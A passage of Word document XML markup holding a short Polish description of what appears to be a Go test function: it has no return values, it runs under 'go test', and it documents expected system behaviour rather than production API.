        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>brak wartości zwracanych; funkcja działa przez efekt uboczny albo kończy przepływ sterowania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Uwagi wykonawcze:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uruchamiana przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>go test</w:t>
      </w:r>
      <w:r>
        <w:t>; nie stanowi API produkcyjnego, ale dokumentuje oczekiwane zachowanie systemu.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Strona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7" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi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0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